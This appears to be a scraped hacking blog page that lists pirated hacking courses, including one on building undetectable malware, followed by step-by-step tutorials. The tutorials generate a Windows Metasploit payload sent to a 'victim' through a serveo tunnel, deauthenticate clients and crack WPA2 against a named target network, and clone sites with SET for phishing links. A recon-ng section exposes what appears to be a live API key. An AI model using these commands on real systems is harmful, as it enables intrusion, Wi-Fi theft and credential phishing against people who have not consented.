Computer with a minimum of 4GB ram/memory
Operating System: Windows / OS X / Linux
For WiFi cracking (10 lectures ONLY) – Wireless adapter that supports monitor mode (more info provided in the course).
Description
Welcome this comprehensive course on Ethical Hacking! This course assumes you have NO prior knowledge in hacking and by the end of it you’ll be able to hack systems like black-hat hackers and secure them like security experts!

This course is highly practical but it won’t neglect the theory, so we’ll start with ethical hacking basics and the different fields in penetration testing, installing the needed software (works on Windows, Linux and Mac OS X) and then we’ll dive and start hacking systems straight away. From here onwards you’ll learn everything by example, by analysing and exploiting computer systems such as networks, servers, clients, websites …..etc, so we’ll never have any boring dry theoretical lectures.

The course is divided into a number of sections, each section covers a penetration testing / hacking field, in each of these sections you’ll first learn how the target system works, the weaknesses of this system, and how to practically exploit theses weaknesses and hack into it, not only that but you’ll also learn how to secure this system from the discussed attacks. This course will take you from a beginner to a more advanced level by the time you finish, you will have knowledge about most penetration testing fields.

The course is divided into four main sections:

1. Network Hacking – This section will teach you how to test the security of networks, both wired and wireless. First, you will learn some basic network terminology, how networks work, and how devices communicate with each other. Then it will branch into three sub sections:

Pre-connection attacks: in this subsection you’ll learn what can you do before even connecting to a network, and even before having internet access; you’ll start by learning how to gather information about the networks around you, discover the devices connected to them, and how to control connections around you (ie: deny/allow devices from connecting to networks) even without knowing the password of the target network.
Gaining Access: Now that you gathered information about the networks around you, in this subsection you will learn how to crack the key and get the password to your target network weather it uses WEP, WPA or even WPA2.
Post Connection attacks: Now that you have the key, you can connect to the target network, in this subsection you will learn a number of powerful techniques that allow you to gather comprehensive information about the connected devices, see anything they do on the internet (such as login information, passwords, visited urls, images, videos ….etc), redirect requests, inject evil code in loaded pages and much more! All the attacks here work against both wireless and wired networks. You will also learn how to create a fake WiFi network, attract users to connect to it and use all of the above techniques against the connected clients.
2. Gaining Access – In this section you will learn two main approaches to gain full control or hack computer systems:

Server Side Attacks: In this subsection you will learn how to gain full access to computer systems without the need for user interaction. You will learn how to gather useful information about a target computer system such as its operating system, open ports, installed services, then you’ll learn how to use this information to discover weaknesses and vulnerabilitiesand exploit them to gain full control over the target. Finally you will learn how to generate different types of reports for your discoveries.
Client Side Attacks – If the target system does not contain any weaknesses then the only way to gain access to it is by interacting with the users, in this subsection you’ll learn how to get the target user to install a backdoor on their system without even realising, this is done by hijacking updatesor backdoornig downloadeds on the fly. Not only that but you’ll also learn how to create trojans by backdooring normal files (such as an image or a pdf) and use social engineering to deliver this trojan to the target, to do this you’ll learn how to spoof emails so they appear as if they’re sent from the target’s friend, boss or any email account they’re likely to interact with.
3. Post Exploitation – In this section you will learn how to interact with the systems you compromised so far. You’ll learn how to access the file system (read/write/upload/execute), maintain your access, spy on the target and even use the target computer as a pivot to hack other computer systems.

4. Website / Web Application Hacking – In this section you will learn how websites work, how to gather information about a target website (such as website owner, server location, used technologies ….etc) and how to discover and exploit the following dangerous vulnerabilities to hack into websites:

File Upload.
Code Execution.
Local File Inclusion.
Remote File Inclusion.
SQL Injection.
Cross Site Scripting (XSS).
At the end of each section you will learn how to detect, prevent and secure your system and yourself from the discussed attacks.

All the techniques in this course are practical and work against real systems, you’ll understand the whole mechanism of each technique first, then you’ll learn how to use it to hack into the target system, so by the end of the course you’ll be able to modify the these techniques to launch more powerful attacks, and adopt them to different situations and different scenarios.

With this course you’ll get 24/7 support, so if you have any questions you can post them in the Q&A section and we’ll respond to you within 15 hours.

NOTE: This course is created for educational purposes only and all the attacks are launched in my own lab or against devices that I have permission to test.

NOTE: This course is totally a product of Zaid Sabih and no other organisation is associated with it or a certification exam. Although, you will receive a Course Completion Certification from Udemy, apart from that NO OTHER ORGANISATION IS INVOLVED.

Who this course is for:
Anybody who is interested in learning ethical hacking / penetration testing
Anybody who wants to learn how hackers hack computer systems
Anybody who wants to learn how to secure their systems from hackers
Created by Zaid Sabih, z Security

DOWNLOAD HERE

Bug Bounty Hunting Full Course

Description
Welcome to Bug Bounty Hunting – Offensive Approach to Hunt Bugs. this course will cover most of the vulnerabilities of OWASP TOP 10 & Web Application Penetration Testing.
you will start as a beginner with no hands-on experience on bug bounty hunting and Penetration testing, after this course you will emerge as a stealth Bug Bounty Hunter.

Bug bounty hunting is the act of finding security vulnerabilities or bugs in a website and responsibly disclosing it to that company’s security team in an ethical way.
Bug bounties, also known as responsible disclosure programs, are set up by companies to encourage people to report potential issues discovered on their sites.
Some companies choose to reward a researcher with bounty, swag, or an entry in their hall-of-fame list.
If you are interested in web application security then they have a great place of honing your skills, with the potential of earning some bounty and credibility at the same time.

requirements
You should be able to use a PC at Beginner Level nothing more than that
Internet Surf | Web Technologies
Tools Required – Python 2.7 | Burpsuite Community OR PRO and Firefox Browser

DOWNLOAD HERE

how to make virus full course download

How Hackers are Bypassing the Majority of Antivirus Software program and Creating Malware and Viruses that Are Undetectable
Necessities
Open Thoughts and Willingness to Implement
Pocket book or Journal to Take Plenty of Notes
Description

You’re about to learn the way hackers create undetectable malware.

Expert hackers should not utilizing of the shelf merchandise to create malware. They’re utilizing subtle strategies to create malware and viruses which are undetectable my hottest antivirus options.

You’ll learm how you can set up Python and Pip in addition to how you can set up the Veil Framework.

Additionally, you will learn to set up Metasploit and add the ultimate touches to the Veil Framework.

Lastly it is possible for you to to create your very personal payload with Veil and learn to encrypt the payload.

You may be proven how the payload will be put in on a Home windows 10 machine and the way it will evade detection by the newest antivirus software program.

See how hackers can probably steal recordsdata, management webcams, seize screenshots, add recordsdata and even modify and manipulate recordsdata.

Take this course right now. It comes with a 30 day a refund assure.

Who’s the audience?
Anybody eager to study Moral Hacking and Malware
Anybody eager to Be a Extremely Sought After Moral Hacker by Understanding How Hackers Suppose

DOWNLOAD HERE

Social Engineering Attacks With Android Full Course

learn Ethical Hacking with Android ,Use Your Android Device As a Penetration Testing Tool
Requirements
Some Experience Using Android
Basic IT Skills
Description

This highly-interactive course balances sensible lectures and dialogue with a number of hands-on workout routines, demonstrations.

On this course, I’m going to take you thru the assorted phases in order to know what’s Social Engineering, Social Engineering Life cycle, the assorted Methods utilized in Social Engineering assaults with detailed examples after which lastly conclude with the counter-measures to guard towards every of the Social Engineering assault strategies.

If you’re a newbie or do not having the information concerning the hacking when you gonna take this course am certain that by the top this course you should have the superior degree information about hacking or penetration testing.

This course is meant that can assist you higher put together your group for the protection of social engineering assaults, in addition to the way to ethically use these strategies for intelligence gathering.

Did You Know?

Social engineering assaults, that are sometimes launched by way of e mail, embrace phishing, spear-phishing and Enterprise E-mail Compromise (BEC). In keeping with the FBI, BEC scams have resulted in losses of £2.four billion ($3.1 billion) within the earlier years.

NOTE: This course is created for academic functions solely and all of the assaults are launched in my very own lab or towards units that I’ve permission to check.

Who this course is for:
Individuals who need to study moral hacking.
Individuals who need to find out how hackers hack into safe programs that wouldn’t have any vulnerabilities.
Anybody who desires to study social engineering instruments and strategies
People who find themselves prepared to make a profession in Cyber Safety

DOWNLOAD HERE

Wireshark full course

Use wireshark as an advanced user.
Apply successfully for network admin jobs.

Work as a freelancer using wireshark skills learned in this course.

See how to add a wireshark certificate to your LinkedIn profile!
Requirements
Have a computer capable of running wireshark.
Consistent experience with accessing the internet and working online.
Description
Wireshark is much easier to learn when you take this course and try everything you see for yourself! Wireshark is a free open-source packet analyzer that is the number one tool for network analysis, troubleshooting, software and communications protocol development, and related education in networking. Knowing Wireshark gives you the ability to successfully apply for network administrator jobs and easily earn money as a freelancer online because Wireshark is an in demand skill!

Use this course to speed up your learning with Wireshark with hands on tutorials showing you exactly what you can do in Wireshark founded on explanations of basic network terminology, installing Wireshark, and a review of the basic functions. The course begins with the basics and continues to dive deeper allowing you to follow along and try everything you see for yourself!

You should act on your feelings of love, hope, and faith to take this course now if you want to learn a valuable skill to use in your own company or to make money as a freelancer or employee working in a network administration job!

Who this course is for:
Network administrators looking to build deeper knowledge of wireshark.
Entrepreneurs desiring to learn more about network protocols.
Freelancers wishing to add an in demand skill to their profile.
Created by Ermin Kreponic

English

DOWNLOAD HERE

Setting up recon-ng

Welcome laughing man here back with another one this one is on setting up recon-ng this is used for gaining info on targets .

What is Recon

recon-ng is a full-featured Web Reconnaissance framework written in Python. … Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the “module” class. credits to kali.org as u see it is a lot like metasploit so its pretty neat .

how to use

right open your terminal and type recon-ng when it starts a list of the keys you will need to add to get the tool to work
Hacking A Rise keysonstartupmissing
Hacking A Rise startuprecon-ng

so what you do is sign up to each these services

API Keys

bing_api (optional $$$) – Sign up here (I chose the free plan), agree to all the terms until you get to “Thank You”, then go here to view the key. (free account: 5000 transactions per month)
builtwith_api – Go here and sign up. Once you enter an email and password, it will show you the API key
censysio_id – Go here and sign up. Once you register, confirm your account by clicking on the link in the email. Then login and go here to view the “ID” and “Secret”
censysio_secret – Look at #3
facebook_api – This one is a bit more in-depth. Click here, login to Facebook (or register if you don’t have one). Once logged in, in the top-right, click “My Apps”, then “Add a new app”. Click the “Add a new app” green button. Type any name you want and select any category. This will create a new app, now click “Dashboard” in the top left. Copy the “App ID” and “App Secret” from that page. For this field, you want to use “App ID”
facebook_password – Note: Due to order of the API keys, this does not have to do with #5 above! This is simply your facebook password. Or make a new facebook and use that password!
facebook_secret – This is the “App Secret” from #5
facebook_username – This is your facebook username that has the password listed in #6. Make a new facebook account if you want
flickr_api – Go here and click “Request an API Key” under “Get your API key”. Login to Yahoo (or make an account). If you had to create a Yahoo/Flickr account, you may need to click the link again after registering. Choose “Apply for non-commercial key”. Fill in some filler information (it really doesn’t matter what you put here). Then you will get an “API Key” and “Secret”. Use “API Key” for this entry (Note: Untested, don’t know if you need “Secret” too or what. Open bug report here)
fullcontact_api (optional $$$)– Go here and click “Get a key”. Sign up. You will be shown an API key immediately after signing up (free account: 500 Person and Company matches per month, and 60 queries per minute)
github_api – Go here (login if necessary, then click the link). Click “Generate new token” in the top right corner. You don’t need to give the token any permissions (and I recommend that you don’t), just click “Generate Token”. You will be shown the token
google_api (optional $$$) – Go here (login if necessary). At the top left, click the dropdown “Project”, then “Create project”. Enter a project name, then hit “Create”. Once the project is created, go here and click “Create Credentials” and select “API Keys”. It displays the key to use here. Click “close” after you save it, _not “Restrict Key”._Then go to”Library” on the left, click “Custom Search API” (bottom-ish), and click “Enable”. Done! (free account: 100 search queries per day for free)
google_cse – Go here (login if necessary). Click “Create”, enter “www.google.com” with “Sites to search”, then click “Create” button. On the next page, click “Control Panel”. Under “Sites to search”, choose “Search the entire web but emphasize included sites” in the dropdown, then click the “Update” button at the bottom. On the same page, scroll up and click “Search Engine ID” under “Details”. Thats the key to use here!
hashes_api – Register here (or login). Confirm your account via email link. Login with your new account, then click here. Your API key should be listed.
instagram_api – Register here (or login). Once logged in, click here and create a new application. Add “http://localhost:31337” as the “OAuth redirect_uri”. Click “Manage Clients” at the top of the screen and the API key will be available as the “CLIENT_ID” (Note: Instagram wasn’t functioning when I wrote this…it may be different)
instagram_secret – Same as #15 but its “CLIENT_SECRET”
ipinfodb_api – Register here. You must enter the IP you will use recon-ng from under “Server IP”. I recommend you use a VPN or server or something so the IP never changes. Activate the account via email link. The api key will be given to you on account activation
jigsaw_api (Requires $$$) – Register here. Once registered, you must send a special request to get an API key. No specifics here because its very expensive!.
jigsaw_password (Requires $$$) – Register here. This is the password for your account that you create and sign up for a plan with!
jigsaw_username (Requires $$$) – Same as #19, but this is the account password.
linkedin_api – Go here (register/login if necessary) and click “Create Application”. Fill out the information with random stuff…annoyingly it requires an image with the same width and height. I used this. It will show you the “Client ID”, which is this key. Add “http://localhost:31337” under “OAuth 2.0”. Check all the boxes under “Default Application Permissions”. Click “Update”. For this API to function fully, you must submit this form. Fill out information explaining what you will use it for, etc. Pain in the butt, but necessary.
linkedin_secret – Same as but its the “Client Secret”
pwnedlist_api – Service has been officially shut down
pwnedlist_iv – Service has been officially shut down
pwnedlist_secret – Service has been officially shut down
shodan_api (optional $$$)– . Activate your account via email. The API key will be shown upon login. (free account: basic search capabilities. Premium account with full access is a one-time payment of $50 and pretty worth it)
twitter_api – Go here and login/register as needed. Click “Create New App”. Enter in filler information of your app. Once the application is created, click on “manage keys and access tokens”. The key is “Consumer Key (API Key)”.
twitter_secret – Same as #27, but the key is “Consumer Secret (API Secret)”
virustotal_api (If using a branch with it) – Go here and click “Join our community” in the top right. Active the account via email, then login. Click your username in the top right, then click “My API Key”. The API key will be shown. A “public” API will be sufficient.

so lets have a look at the keys we got in the database so type this command show keys
Hacking A Rise keys

ok we have none so lets start adding them the one im going to add is builtwith_api sign up here and go to tool API access
Hacking A Rise apiaccess    copy the api key it gaves you now go back to recon-ng and type keys add builtwith_api 0644f3ac-ba8b-4a1f-83b6-ab4dc2e3f824
Hacking A Rise addkeys

there ya got its the same for all the API’S
ENJOY

How to make Windows payload with sploitgen!!

Hello and Welcome to the tutorial on making a windows payload with sploitgen!!

What is Sploitgen

sploitgen is msfvemon payload gen with no port forwarding as it uses serveo this tunnels the posts true ssh

Setting up sploitgen

First we want to download sploitgen from github with commandgit clone https://github.com/Hackingriseofficial/sploitgen.git

Now once we have sploitgen downloaded, we want to go into it so open terminal and type cd sploitgen then ls

Now we run ./sploitgen.sh

Hacking A Rise Screenshot-at-2019-04-11-06-11-44

 

 

Making the payload

Now we have sploitgen running we want to choose the option 1

Hacking A Rise Screenshot-at-2019-04-11-06-12-19

and then choose option 2 and press enter

Hacking A Rise Screenshot-at-2019-04-11-06-12-59

now you see something like this and you just select y for yes if you want, but for this post I will select y

Hacking A Rise Screenshot-at-2019-04-11-06-13-38

now you want to send the info like this;

[*] Starting server…

[*] Send the first link to target + /payload.exe:
Forwarding HTTP traffic from https://confido.serveo.net
Forwarding TCP connections from serveo.net:2250

[*] Starting MSF Listener…

to the victim

Hacking A Rise Screenshot-at-2019-04-11-06-15-41

Now you should see something like this in metasploit

Hacking A Rise Screenshot-at-2019-04-11-06-16-17

Well done you have made the payload and opened a msf listener with sploitgen, now you want to make sure the victim have clicked the link and installed your payload, if you want to know what you can do once you have obtained access to your victims pc you can check out our other posts on metasploit.

DISCLAIMER:

This post is for educational purposes only! Whatever you do with the information provided in this post is all on you and we do not provide consent or responsibility for the actions you perform! Thanks for reading. See you next time!!

Wednesday, April 10, 2019

AIRCRACK AND CRUNCH

welcome to hacking a rise in this we are using no password list as we are piping crunch with aircrack

What is crunch

Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations. Some other options are: The Associative Word List Generator (AWLG) – Wordlists for Password Cracking

How to use

so lets get stuck in to this so open a terminal and type ifconfig
Hacking A Rise ifconfig

I recommend using a USB WiFi Card as most systems use wlan0 as the default so the USB is wlan1 so what we are doing we are going to put the card in to monitor mode this will let us see all the networks public and hidden like WiFi cams so now type airmon-ng start wlan1
Hacking A Rise airmon-ngstart

as u see in the pic my usb wifi card is now wlan1mon so now we are in monitor mode we can now start the airodump-ng so open the terminal and type airodump-ng wlan1mon
Hacking A Rise airodump1

are target is HUAWEI-B525-FD28 so what we wanna do is change the channel to 5 since my network is on channel 5 so we open a new terminal and type airodump-ng -c 5 --bssid E4:0E:EE:B1:FD:28 -w /root/desktop/ wlan1mon

now we wanna force the client of the target to sign in to the network agen so type this command aireplay-ng -0 100 -a E4:0E:EE:B1:FD:28 -c 00:13:E8:21:AF:81 wlan1mon

Hacking A Rise airplay

now we can use aircrack and crunch to brute the wifi this method is handy for devices with little or no memory
with till u get a four way handshake once u get it we can now crack the wifi with aircrack so type crunch 1 24| aircrack-ng -e HUAWEI-B525-FD28 -w – desktop-01.cap
Hacking A Rise aircrackcrunch

just let it finish but keep this in mind it is very very slow so anyways best luck and hack the plant 🙂

HOW TO HACK WPA2 WITH AIRCRACK-NG

Welcome to hacking a rise in this post we will be hacking WiFi with aircrack-ng keep this in mind this method is slow as fuck it depends on your device and wordlist so if u got a shit device it will take ages to crack.

What is aircrack-ng

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

How to use

so lets get stuck in to this so open a terminal and type ifconfig
Hacking A Rise ifconfig

I recommend using a USB WiFi Card as most systems use wlan0 as the default so the USB is wlan1 so what we are doing we are going to put the card in to monitor mode this will let us see all the networks public and hidden like WiFi cams so now type airmon-ng start wlan1
Hacking A Rise airmon-ngstart

as u see in the pic my usb wifi card is now wlan1mon so now we are in monitor mode we can now start the airodump-ng so open the terminal and type airodump-ng wlan1mon
Hacking A Rise airodump1

are target is HUAWEI-B525-FD28 so what we wanna do is change the channel to 5 since my network is on channel 5 so we open a new terminal and type airodump-ng -c 5 --bssid E4:0E:EE:B1:FD:28 -w /root/desktop/ wlan1mon

now we wanna force the client of the target to sign in to the network agen so type this command aireplay-ng -0 100 -a E4:0E:EE:B1:FD:28 -c 00:13:E8:21:AF:81 wlan1mon

Hacking A Rise airplay

with till u get a four way handshake once u get it we can now crack the wifi with aircrack so type aircrack-ng -a2 -b E4:0E:EE:B1:FD:28 -w /root/Desktop//toolsandscripts/rockyou.txt desktop-01.cap
Hacking A Rise aircrack

there ya go that simple lads

SE-TOOLKIT WITH NO PORT FORWARDING

Welcome to hacking a rise in this were going to show you how to make phishing pages with SE toolkit with out forwarding your ports how we going to do this with ngrok or serveo me i use serveo a lot as its fucking great no need to sign up unlike ngrok so ya and ways lets get this shit started 🙂

How to use

ok open your terminal and type this command
ssh -R 80:localhost:80 serveo.net

Hacking A Rise serveosetup

now open a new terminal and type setoolkit AND PRESS 1
Hacking A Rise setoolkitcommands

Hacking A Rise setoolkitstartup
PRESS 2
Hacking A Rise pressone
PRESS 3
Hacking A Rise press2
PRESS 2
Hacking A Rise sitcloner
ENTER THE SERVEO LINK HERE
Hacking A Rise linkhere
SITE U WANNA CLONE
Hacking A Rise sitetoclone
DONE
Hacking A Rise done

now all u need todo is use a link shortner and send it that was found here

the page will look like this 🙂
Hacking A Rise page